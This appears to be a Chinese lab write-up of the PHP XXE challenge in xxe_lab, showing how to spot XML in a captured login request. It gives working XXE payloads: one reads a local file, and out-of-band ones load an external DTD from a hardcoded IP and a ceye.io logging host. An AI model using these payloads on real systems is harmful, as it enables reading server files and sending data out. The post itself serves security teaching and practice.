php_xxe

image.png
这是xxe_lab 里面的php xxe的题目
看这个xxe 的 漏洞 一般看包里面是否存在<> 这种标签 或者 存在xml 的格式
抓包查看
输入 admin 123456 之后
image.png
正常的一般提交数据 都是 username = admin password= 123456
这里却不是这样的
很想html 和xml 的 语法
image.png
发送过去返回的格式就是 text/html

image.png
这里 <!ENTITY f 这里的 f
在下面xml 数据里面要有 相当于是个变量
&f;
所以就输出了 123123

<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY f SYSTEM "file:///C://123.txt">
]>
<user><username>&f;</username><password>admin</password></user>

外带

payload

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://211.159.223.136:888/xs.dtd">%aaa;%ccc;%ddd;]>
<user><username>&aaa;</username><password>1</password></user>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://192.168.100.123.wvt4ld.ceye.io/xxe_test">
%remote;]>
<root/>
<user><username>&remote;</username><password>1</password></user>


image.png
image.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值